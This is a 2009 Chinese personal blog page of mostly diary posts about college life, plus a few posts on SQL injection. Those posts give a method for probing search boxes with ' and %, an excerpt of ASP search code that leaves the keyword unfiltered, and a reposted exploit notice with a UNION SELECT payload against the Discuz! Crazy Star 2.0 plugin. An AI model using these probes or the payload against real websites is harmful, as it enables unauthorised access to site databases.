龙儿心's blog
百度空间 | 百度首页 
 
文章列表
 
2009-10-11 17:06

简单的判断搜索型注入漏洞存在不存在的办法是先搜索',如果出错,说明90%存在这个漏洞。然后搜索%,如果正常返回,说明95%有洞了。

 
2009-10-11 16:35

目前,一些网站为了方便用户查找网站的资源,都对用户提供了搜索的功能,因为是搜索功能,往往是程序员在编写代码时都忽略了对其变量(参数)的过滤,而且这样的漏洞在国内的系统中普遍的存在,常见的搜索功能代码如下:

..................
keyword=trim(request.From("keyword")
获取客户端提交在要查询的关键字,并过滤了两边的空格

if keyword="" then 如果关键字为空,则输出下面的"查询内容不能为空!'"
response.Write "alert('查询内容不能为空!');history.back(-1);

 
2009-09-29 08:04

十一放假了,回家喽,嘿嘿~

 
2009-09-24 10:09

貌似不习惯在校园里人多的地方穿梭!

 
2009-09-23 08:07

这几天老睡不好觉,吃不好饭,我到底怎么了?

心里有那些事情放不开吧,哎……

曾经到如今一直很单纯,很天真!

 
2009-09-08 00:20
特此感谢33帮我完成了我遇到很多次的的一个难题!
谢谢33!
 
2009-08-31 23:25

困了,睡觉去了!

晚安朋友们!

 
2009-08-31 00:29

今天就正式上课了,哎!

大三-离开校园最后的一年!

不敢想象会发生什么!

我信命,我相信这一切都是自己走出来的!

为自己加油!

 
2009-08-27 13:11

[+] Founded : ZhaoHuAn
[+] Contact : ZhengXing[at]shandagames[dot]com
[+] Blog : http://www.patching.net/zhaohuan/
[+] Date : August, 26th 2009 [Double Seventh Festival]

========================[Soft Info]=========================

Software: Discuz! Plugin Crazy Star(family)
Version : 2.0
Vendor : http://www.discuz.com

[-] Exploit:
[+] 1) Register a User
2) Login!
[+] and+1=2+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19

 
2009-08-25 00:11

好久没有在网吧通宵过了,今天我来了,哈哈!

 
     
 
 
个人档案
 
hackxiaolong

上次登录:
9天前
加为好友
 
   
 
文章分类
 
 
 
 
 
 
 
 
 
     
 
最新评论
 
文章评论|照片评论


学习中。。。理解中。。。
 

回复yang520065:没有啊!
 

[表情]
 

吃醋了????
 

小三那淫?
 
     
 
好友最新文章
 
     
 
最近访客
 
 

yg5666

杨爱杜

admi520

90seo

黑夜bug

ANN1217cc

┌怖鲑鲑﹎ˇ

hack2b
     
 
背景音乐
 
 
订阅我的空间
 
已有人次访问本空间
 
订阅RSS  什么是RSS?

您也想拥有这样的空间?请点此申请。
     


©2009 Baidu